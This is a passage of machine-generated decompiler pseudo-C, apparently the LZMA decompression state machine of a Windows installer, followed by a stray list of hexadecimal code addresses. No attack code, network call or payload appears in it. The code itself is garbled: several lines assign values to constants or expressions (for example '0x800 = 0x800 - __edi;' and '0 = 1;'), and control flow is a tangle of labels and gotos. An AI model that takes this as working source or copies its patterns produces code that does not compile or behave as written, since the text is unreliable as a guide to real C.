                                            										__edx = __ebx + __ebx;
                                            										__ecx =  *(__ebp - 0x10);
                                            										__esi = __edx + __eax;
                                            										__ecx =  *(__ebp - 0x10) >> 0xb;
                                            										__ax =  *__esi;
                                            										 *(__ebp - 0x54) = __esi;
                                            										__edi = __ax & 0x0000ffff;
                                            										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            										if( *(__ebp - 0xc) >= __ecx) {
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            											__cx = __ax;
                                            											_t169 = __edx + 1; // 0x1
                                            											__ebx = _t169;
                                            											__cx = __ax >> 5;
                                            											 *__esi = __ax;
                                            										} else {
                                            											 *(__ebp - 0x10) = __ecx;
                                            											0x800 = 0x800 - __edi;
                                            											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            											__ebx = __ebx + __ebx;
                                            											 *__esi = __cx;
                                            										}
                                            										 *(__ebp - 0x44) = __ebx;
                                            										if( *(__ebp - 0x10) < 0x1000000) {
                                            											L45:
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												 *(__ebp - 0x88) = 0xe;
                                            												goto L170;
                                            											}
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t155 = __ebp - 0x70;
                                            											 *_t155 =  *(__ebp - 0x70) + 1;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            										}
                                            									}
                                            									L53:
                                            									_t172 = __ebp - 0x34;
                                            									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                            									L54:
                                            									__al =  *(__ebp - 0x44);
                                            									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                            									L55:
                                            									if( *(__ebp - 0x64) == 0) {
                                            										 *(__ebp - 0x88) = 0x1a;
                                            										goto L170;
                                            									}
                                            									__ecx =  *(__ebp - 0x68);
                                            									__al =  *(__ebp - 0x5c);
                                            									__edx =  *(__ebp - 8);
                                            									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                            									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                            									 *( *(__ebp - 0x68)) = __al;
                                            									__ecx =  *(__ebp - 0x14);
                                            									 *(__ecx +  *(__ebp - 8)) = __al;
                                            									__eax = __ecx + 1;
                                            									__edx = 0;
                                            									_t191 = __eax %  *(__ebp - 0x74);
                                            									__eax = __eax /  *(__ebp - 0x74);
                                            									__edx = _t191;
                                            									L79:
                                            									 *(__ebp - 0x14) = __edx;
                                            									L80:
                                            									 *(__ebp - 0x88) = 2;
                                            									goto L1;
                                            								}
                                            								if(__ebx >= 0x100) {
                                            									goto L53;
                                            								}
                                            								goto L40;
                                            							} else {
                                            								L36:
                                            								if( *(__ebp - 0x6c) == 0) {
                                            									 *(__ebp - 0x88) = 0xd;
                                            									L170:
                                            									_t568 = 0x22;
                                            									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                            									_t535 = 0;
                                            									L172:
                                            									return _t535;
                                            								}
                                            								__ecx =  *(__ebp - 0x70);
                                            								__eax =  *(__ebp - 0xc);
                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            								_t121 = __ebp - 0x70;
                                            								 *_t121 =  *(__ebp - 0x70) + 1;
                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            								goto L38;
                                            							}
                                            						}
                                            					}
                                            					L1:
                                            					_t534 =  *(_t614 - 0x88);
                                            					if(_t534 > 0x1c) {
                                            						L171:
                                            						_t535 = _t534 | 0xffffffff;
                                            						goto L172;
                                            					}
                                            					switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
                                            						case 0:
                                            							if( *(_t614 - 0x6c) == 0) {
                                            								goto L170;
                                            							}
                                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                            							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                            							_t534 =  *( *(_t614 - 0x70));
                                            							if(_t534 > 0xe1) {
                                            								goto L171;
                                            							}
                                            							_t538 = _t534 & 0x000000ff;
                                            							_push(0x2d);
                                            							asm("cdq");
                                            							_pop(_t570);
                                            							_push(9);
                                            							_pop(_t571);
                                            							_t610 = _t538 / _t570;
                                            							_t540 = _t538 % _t570 & 0x000000ff;
                                            							asm("cdq");
                                            							_t605 = _t540 % _t571 & 0x000000ff;
                                            							 *(_t614 - 0x3c) = _t605;
                                            							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                            							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                            							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                            							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                            								L10:
                                            								if(_t613 == 0) {
                                            									L12:
                                            									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                            									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                            									goto L15;
                                            								} else {
                                            									goto L11;
                                            								}
                                            								do {
                                            									L11:
                                            									_t613 = _t613 - 1;
                                            									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                            								} while (_t613 != 0);
                                            								goto L12;
                                            							}
                                            							if( *(_t614 - 4) != 0) {
                                            								GlobalFree( *(_t614 - 4));
                                            							}
                                            							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                            							 *(_t614 - 4) = _t534;
                                            							if(_t534 == 0) {
                                            								goto L171;
                                            							} else {
                                            								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                            								goto L10;
                                            							}
                                            						case 1:
                                            							L13:
                                            							__eflags =  *(_t614 - 0x6c);
                                            							if( *(_t614 - 0x6c) == 0) {
                                            								 *(_t614 - 0x88) = 1;
                                            								goto L170;
                                            							}
                                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                            							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                            							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                            							_t45 = _t614 - 0x48;
                                            							 *_t45 =  *(_t614 - 0x48) + 1;
                                            							__eflags =  *_t45;
                                            							L15:
                                            							if( *(_t614 - 0x48) < 4) {
                                            								goto L13;
                                            							}
                                            							_t546 =  *(_t614 - 0x40);
                                            							if(_t546 ==  *(_t614 - 0x74)) {
                                            								L20:
                                            								 *(_t614 - 0x48) = 5;
                                            								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                            								goto L23;
                                            							}
                                            							 *(_t614 - 0x74) = _t546;
                                            							if( *(_t614 - 8) != 0) {
                                            								GlobalFree( *(_t614 - 8)); // executed
                                            							}
                                            							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                            							 *(_t614 - 8) = _t534;
                                            							if(_t534 == 0) {
                                            								goto L171;
                                            							} else {
                                            								goto L20;
                                            							}
                                            						case 2:
                                            							L24:
                                            							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                            							 *(_t614 - 0x84) = 6;
                                            							 *(_t614 - 0x4c) = _t553;
                                            							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                            							goto L132;
                                            						case 3:
                                            							L21:
                                            							__eflags =  *(_t614 - 0x6c);
                                            							if( *(_t614 - 0x6c) == 0) {
                                            								 *(_t614 - 0x88) = 3;
                                            								goto L170;
                                            							}
                                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                            							_t67 = _t614 - 0x70;
                                            							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                            							__eflags =  *_t67;
                                            							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                            							L23:
                                            							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                            							if( *(_t614 - 0x48) != 0) {
                                            								goto L21;
                                            							}
                                            							goto L24;
                                            						case 4:
                                            							goto L133;
                                            						case 5:
                                            							goto L137;
                                            						case 6:
                                            							goto L0;
                                            						case 7:
                                            							__eflags =  *(__ebp - 0x40) - 1;
                                            							if( *(__ebp - 0x40) != 1) {
                                            								__eax =  *(__ebp - 0x24);
                                            								 *(__ebp - 0x80) = 0x16;
                                            								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                            								__eax =  *(__ebp - 0x28);
                                            								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                            								__eax =  *(__ebp - 0x2c);
                                            								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                            								__eax = 0;
                                            								__eflags =  *(__ebp - 0x38) - 7;
                                            								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                            								__al = __al & 0x000000fd;
                                            								__eax = (__eflags >= 0) - 1 + 0xa;
                                            								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                            								__eax =  *(__ebp - 4);
                                            								__eax =  *(__ebp - 4) + 0x664;
                                            								__eflags = __eax;
                                            								 *(__ebp - 0x58) = __eax;
                                            								goto L68;
                                            							}
                                            							__eax =  *(__ebp - 4);
                                            							__ecx =  *(__ebp - 0x38);
                                            							 *(__ebp - 0x84) = 8;
                                            							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                            							goto L132;
                                            						case 8:
                                            							__eflags =  *(__ebp - 0x40);
                                            							if( *(__ebp - 0x40) != 0) {
                                            								__eax =  *(__ebp - 4);
                                            								__ecx =  *(__ebp - 0x38);
                                            								 *(__ebp - 0x84) = 0xa;
                                            								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                            							} else {
                                            								__eax =  *(__ebp - 0x38);
                                            								__ecx =  *(__ebp - 4);
                                            								__eax =  *(__ebp - 0x38) + 0xf;
                                            								 *(__ebp - 0x84) = 9;
                                            								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                            								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                            							}
                                            							goto L132;
                                            						case 9:
                                            							__eflags =  *(__ebp - 0x40);
                                            							if( *(__ebp - 0x40) != 0) {
                                            								goto L89;
                                            							}
                                            							__eflags =  *(__ebp - 0x60);
                                            							if( *(__ebp - 0x60) == 0) {
                                            								goto L171;
                                            							}
                                            							__eax = 0;
                                            							__eflags =  *(__ebp - 0x38) - 7;
                                            							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                            							__eflags = _t258;
                                            							0 | _t258 = _t258 + _t258 + 9;
                                            							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                            							goto L75;
                                            						case 0xa:
                                            							__eflags =  *(__ebp - 0x40);
                                            							if( *(__ebp - 0x40) != 0) {
                                            								__eax =  *(__ebp - 4);
                                            								__ecx =  *(__ebp - 0x38);
                                            								 *(__ebp - 0x84) = 0xb;
                                            								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                            								goto L132;
                                            							}
                                            							__eax =  *(__ebp - 0x28);
                                            							goto L88;
                                            						case 0xb:
                                            							__eflags =  *(__ebp - 0x40);
                                            							if( *(__ebp - 0x40) != 0) {
                                            								__ecx =  *(__ebp - 0x24);
                                            								__eax =  *(__ebp - 0x20);
                                            								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                            							} else {
                                            								__eax =  *(__ebp - 0x24);
                                            							}
                                            							__ecx =  *(__ebp - 0x28);
                                            							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                            							L88:
                                            							__ecx =  *(__ebp - 0x2c);
                                            							 *(__ebp - 0x2c) = __eax;
                                            							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                            							L89:
                                            							__eax =  *(__ebp - 4);
                                            							 *(__ebp - 0x80) = 0x15;
                                            							__eax =  *(__ebp - 4) + 0xa68;
                                            							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                            							goto L68;
                                            						case 0xc:
                                            							L99:
                                            							__eflags =  *(__ebp - 0x6c);
                                            							if( *(__ebp - 0x6c) == 0) {
                                            								 *(__ebp - 0x88) = 0xc;
                                            								goto L170;
                                            							}
                                            							__ecx =  *(__ebp - 0x70);
                                            							__eax =  *(__ebp - 0xc);
                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							_t334 = __ebp - 0x70;
                                            							 *_t334 =  *(__ebp - 0x70) + 1;
                                            							__eflags =  *_t334;
                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							__eax =  *(__ebp - 0x2c);
                                            							goto L101;
                                            						case 0xd:
                                            							goto L36;
                                            						case 0xe:
                                            							goto L45;
                                            						case 0xf:
                                            							goto L57;
                                            						case 0x10:
                                            							L109:
                                            							__eflags =  *(__ebp - 0x6c);
                                            							if( *(__ebp - 0x6c) == 0) {
                                            								 *(__ebp - 0x88) = 0x10;
                                            								goto L170;
                                            							}
                                            							__ecx =  *(__ebp - 0x70);
                                            							__eax =  *(__ebp - 0xc);
                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							_t365 = __ebp - 0x70;
                                            							 *_t365 =  *(__ebp - 0x70) + 1;
                                            							__eflags =  *_t365;
                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							goto L111;
                                            						case 0x11:
                                            							L68:
                                            							__esi =  *(__ebp - 0x58);
                                            							 *(__ebp - 0x84) = 0x12;
                                            							goto L132;
                                            						case 0x12:
                                            							__eflags =  *(__ebp - 0x40);
                                            							if( *(__ebp - 0x40) != 0) {
                                            								__eax =  *(__ebp - 0x58);
                                            								 *(__ebp - 0x84) = 0x13;
                                            								__esi =  *(__ebp - 0x58) + 2;
                                            								goto L132;
                                            							}
                                            							__eax =  *(__ebp - 0x4c);
                                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                            							__ecx =  *(__ebp - 0x58);
                                            							__eax =  *(__ebp - 0x4c) << 4;
                                            							__eflags = __eax;
                                            							__eax =  *(__ebp - 0x58) + __eax + 4;
                                            							goto L130;
                                            						case 0x13:
                                            							__eflags =  *(__ebp - 0x40);
                                            							if( *(__ebp - 0x40) != 0) {
                                            								_t469 = __ebp - 0x58;
                                            								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                            								__eflags =  *_t469;
                                            								 *(__ebp - 0x30) = 0x10;
                                            								 *(__ebp - 0x40) = 8;
                                            								L144:
                                            								 *(__ebp - 0x7c) = 0x14;
                                            								goto L145;
                                            							}
                                            							__eax =  *(__ebp - 0x4c);
                                            							__ecx =  *(__ebp - 0x58);
                                            							__eax =  *(__ebp - 0x4c) << 4;
                                            							 *(__ebp - 0x30) = 8;
                                            							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                            							L130:
                                            							 *(__ebp - 0x58) = __eax;
                                            							 *(__ebp - 0x40) = 3;
                                            							goto L144;
                                            						case 0x14:
                                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                            							__eax =  *(__ebp - 0x80);
                                            							goto L140;
                                            						case 0x15:
                                            							__eax = 0;
                                            							__eflags =  *(__ebp - 0x38) - 7;
                                            							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                            							__al = __al & 0x000000fd;
                                            							__eax = (__eflags >= 0) - 1 + 0xb;
                                            							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                            							goto L120;
                                            						case 0x16:
                                            							__eax =  *(__ebp - 0x30);
                                            							__eflags = __eax - 4;
                                            							if(__eax >= 4) {
                                            								_push(3);
                                            								_pop(__eax);
                                            							}
                                            							__ecx =  *(__ebp - 4);
                                            							 *(__ebp - 0x40) = 6;
                                            							__eax = __eax << 7;
                                            							 *(__ebp - 0x7c) = 0x19;
                                            							 *(__ebp - 0x58) = __eax;
                                            							goto L145;
                                            						case 0x17:
                                            							L145:
                                            							__eax =  *(__ebp - 0x40);
                                            							 *(__ebp - 0x50) = 1;
                                            							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                            							goto L149;
                                            						case 0x18:
                                            							L146:
                                            							__eflags =  *(__ebp - 0x6c);
                                            							if( *(__ebp - 0x6c) == 0) {
                                            								 *(__ebp - 0x88) = 0x18;
                                            								goto L170;
                                            							}
                                            							__ecx =  *(__ebp - 0x70);
                                            							__eax =  *(__ebp - 0xc);
                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							_t484 = __ebp - 0x70;
                                            							 *_t484 =  *(__ebp - 0x70) + 1;
                                            							__eflags =  *_t484;
                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							L148:
                                            							_t487 = __ebp - 0x48;
                                            							 *_t487 =  *(__ebp - 0x48) - 1;
                                            							__eflags =  *_t487;
                                            							L149:
                                            							__eflags =  *(__ebp - 0x48);
                                            							if( *(__ebp - 0x48) <= 0) {
                                            								__ecx =  *(__ebp - 0x40);
                                            								__ebx =  *(__ebp - 0x50);
                                            								0 = 1;
                                            								__eax = 1 << __cl;
                                            								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                            								__eax =  *(__ebp - 0x7c);
                                            								 *(__ebp - 0x44) = __ebx;
                                            								goto L140;
                                            							}
                                            							__eax =  *(__ebp - 0x50);
                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                            							__eax =  *(__ebp - 0x58);
                                            							__esi = __edx + __eax;
                                            							 *(__ebp - 0x54) = __esi;
                                            							__ax =  *__esi;
                                            							__edi = __ax & 0x0000ffff;
                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            							__eflags =  *(__ebp - 0xc) - __ecx;
                                            							if( *(__ebp - 0xc) >= __ecx) {
                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            								__cx = __ax;
                                            								__cx = __ax >> 5;
                                            								__eax = __eax - __ecx;
                                            								__edx = __edx + 1;
                                            								__eflags = __edx;
                                            								 *__esi = __ax;
                                            								 *(__ebp - 0x50) = __edx;
                                            							} else {
                                            								 *(__ebp - 0x10) = __ecx;
                                            								0x800 = 0x800 - __edi;
                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                            								 *__esi = __cx;
                                            							}
                                            							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                            								goto L148;
                                            							} else {
                                            								goto L146;
                                            							}
                                            						case 0x19:
                                            							__eflags = __ebx - 4;
                                            							if(__ebx < 4) {
                                            								 *(__ebp - 0x2c) = __ebx;
                                            								L119:
                                            								_t393 = __ebp - 0x2c;
                                            								 *_t393 =  *(__ebp - 0x2c) + 1;
                                            								__eflags =  *_t393;
                                            								L120:
                                            								__eax =  *(__ebp - 0x2c);
                                            								__eflags = __eax;
                                            								if(__eax == 0) {
                                            									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                            									goto L170;
                                            								}
                                            								__eflags = __eax -  *(__ebp - 0x60);
                                            								if(__eax >  *(__ebp - 0x60)) {
                                            									goto L171;
                                            								}
                                            								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                            								__eax =  *(__ebp - 0x30);
                                            								_t400 = __ebp - 0x60;
                                            								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                            								__eflags =  *_t400;
                                            								goto L123;
                                            							}
                                            							__ecx = __ebx;
                                            							__eax = __ebx;
                                            							__ecx = __ebx >> 1;
                                            							__eax = __ebx & 0x00000001;
                                            							__ecx = (__ebx >> 1) - 1;
                                            							__al = __al | 0x00000002;
                                            							__eax = (__ebx & 0x00000001) << __cl;
                                            							__eflags = __ebx - 0xe;
                                            							 *(__ebp - 0x2c) = __eax;
                                            							if(__ebx >= 0xe) {
                                            								__ebx = 0;
                                            								 *(__ebp - 0x48) = __ecx;
                                            								L102:
                                            								__eflags =  *(__ebp - 0x48);
                                            								if( *(__ebp - 0x48) <= 0) {
                                            									__eax = __eax + __ebx;
                                            									 *(__ebp - 0x40) = 4;
                                            									 *(__ebp - 0x2c) = __eax;
                                            									__eax =  *(__ebp - 4);
                                            									__eax =  *(__ebp - 4) + 0x644;
                                            									__eflags = __eax;
                                            									L108:
                                            									__ebx = 0;
                                            									 *(__ebp - 0x58) = __eax;
                                            									 *(__ebp - 0x50) = 1;
                                            									 *(__ebp - 0x44) = 0;
                                            									 *(__ebp - 0x48) = 0;
                                            									L112:
                                            									__eax =  *(__ebp - 0x40);
                                            									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                            									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                            										_t391 = __ebp - 0x2c;
                                            										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                            										__eflags =  *_t391;
                                            										goto L119;
                                            									}
                                            									__eax =  *(__ebp - 0x50);
                                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                            									__eax =  *(__ebp - 0x58);
                                            									__esi = __edi + __eax;
                                            									 *(__ebp - 0x54) = __esi;
                                            									__ax =  *__esi;
                                            									__ecx = __ax & 0x0000ffff;
                                            									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                            									__eflags =  *(__ebp - 0xc) - __edx;
                                            									if( *(__ebp - 0xc) >= __edx) {
                                            										__ecx = 0;
                                            										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                            										__ecx = 1;
                                            										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                            										__ebx = 1;
                                            										__ecx =  *(__ebp - 0x48);
                                            										__ebx = 1 << __cl;
                                            										__ecx = 1 << __cl;
                                            										__ebx =  *(__ebp - 0x44);
                                            										__ebx =  *(__ebp - 0x44) | __ecx;
                                            										__cx = __ax;
                                            										__cx = __ax >> 5;
                                            										__eax = __eax - __ecx;
                                            										__edi = __edi + 1;
                                            										__eflags = __edi;
                                            										 *(__ebp - 0x44) = __ebx;
                                            										 *__esi = __ax;
                                            										 *(__ebp - 0x50) = __edi;
                                            									} else {
                                            										 *(__ebp - 0x10) = __edx;
                                            										0x800 = 0x800 - __ecx;
                                            										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                            										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                            										 *__esi = __dx;
                                            									}
                                            									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            									if( *(__ebp - 0x10) >= 0x1000000) {
                                            										L111:
                                            										_t368 = __ebp - 0x48;
                                            										 *_t368 =  *(__ebp - 0x48) + 1;
                                            										__eflags =  *_t368;
                                            										goto L112;
                                            									} else {
                                            										goto L109;
                                            									}
                                            								}
                                            								__ecx =  *(__ebp - 0xc);
                                            								__ebx = __ebx + __ebx;
                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                            								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                            								 *(__ebp - 0x44) = __ebx;
                                            								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                            									__ecx =  *(__ebp - 0x10);
                                            									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                            									__ebx = __ebx | 0x00000001;
                                            									__eflags = __ebx;
                                            									 *(__ebp - 0x44) = __ebx;
                                            								}
                                            								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            								if( *(__ebp - 0x10) >= 0x1000000) {
                                            									L101:
                                            									_t338 = __ebp - 0x48;
                                            									 *_t338 =  *(__ebp - 0x48) - 1;
                                            									__eflags =  *_t338;
                                            									goto L102;
                                            								} else {
                                            									goto L99;
                                            								}
                                            							}
                                            							__edx =  *(__ebp - 4);
                                            							__eax = __eax - __ebx;
                                            							 *(__ebp - 0x40) = __ecx;
                                            							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                            							goto L108;
                                            						case 0x1a:
                                            							goto L55;
                                            						case 0x1b:
                                            							L75:
                                            							__eflags =  *(__ebp - 0x64);
                                            							if( *(__ebp - 0x64) == 0) {
                                            								 *(__ebp - 0x88) = 0x1b;
                                            								goto L170;
                                            							}
                                            							__eax =  *(__ebp - 0x14);
                                            							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            							__eflags = __eax -  *(__ebp - 0x74);
                                            							if(__eax >=  *(__ebp - 0x74)) {
                                            								__eax = __eax +  *(__ebp - 0x74);
                                            								__eflags = __eax;
                                            							}
                                            							__edx =  *(__ebp - 8);
                                            							__cl =  *(__eax + __edx);
                                            							__eax =  *(__ebp - 0x14);
                                            							 *(__ebp - 0x5c) = __cl;
                                            							 *(__eax + __edx) = __cl;
                                            							__eax = __eax + 1;
                                            							__edx = 0;
                                            							_t274 = __eax %  *(__ebp - 0x74);
                                            							__eax = __eax /  *(__ebp - 0x74);
                                            							__edx = _t274;
                                            							__eax =  *(__ebp - 0x68);
                                            							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                            							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            							_t283 = __ebp - 0x64;
                                            							 *_t283 =  *(__ebp - 0x64) - 1;
                                            							__eflags =  *_t283;
                                            							 *( *(__ebp - 0x68)) = __cl;
                                            							goto L79;
                                            						case 0x1c:
                                            							while(1) {
                                            								L123:
                                            								__eflags =  *(__ebp - 0x64);
                                            								if( *(__ebp - 0x64) == 0) {
                                            									break;
                                            								}
                                            								__eax =  *(__ebp - 0x14);
                                            								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            								__eflags = __eax -  *(__ebp - 0x74);
                                            								if(__eax >=  *(__ebp - 0x74)) {
                                            									__eax = __eax +  *(__ebp - 0x74);
                                            									__eflags = __eax;
                                            								}
                                            								__edx =  *(__ebp - 8);
                                            								__cl =  *(__eax + __edx);
                                            								__eax =  *(__ebp - 0x14);
                                            								 *(__ebp - 0x5c) = __cl;
                                            								 *(__eax + __edx) = __cl;
                                            								__eax = __eax + 1;
                                            								__edx = 0;
                                            								_t414 = __eax %  *(__ebp - 0x74);
                                            								__eax = __eax /  *(__ebp - 0x74);
                                            								__edx = _t414;
                                            								__eax =  *(__ebp - 0x68);
                                            								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                            								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                            								__eflags =  *(__ebp - 0x30);
                                            								 *( *(__ebp - 0x68)) = __cl;
                                            								 *(__ebp - 0x14) = __edx;
                                            								if( *(__ebp - 0x30) > 0) {
                                            									continue;
                                            								} else {
                                            									goto L80;
                                            								}
                                            							}
                                            							 *(__ebp - 0x88) = 0x1c;
                                            							goto L170;
                                            					}
                                            				}
                                            			}













                                            0x00406453
                                            0x00406456
                                            0x00406456
                                            0x00406459
                                            0x0040645f
                                            0x00406437
                                            0x00406437
                                            0x0040643f
                                            0x00406444
                                            0x00406446
                                            0x00406448
                                            0x00406448
                                            0x00406469
                                            0x0040646c
                                            0x0040640f
                                            0x00406415
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040646e
                                            0x004063ea
                                            0x004063ee
                                            0x004069f6
                                            0x00000000
                                            0x004069f6
                                            0x004063f4
                                            0x004063f7
                                            0x004063fa
                                            0x004063fe
                                            0x00406401
                                            0x00406407
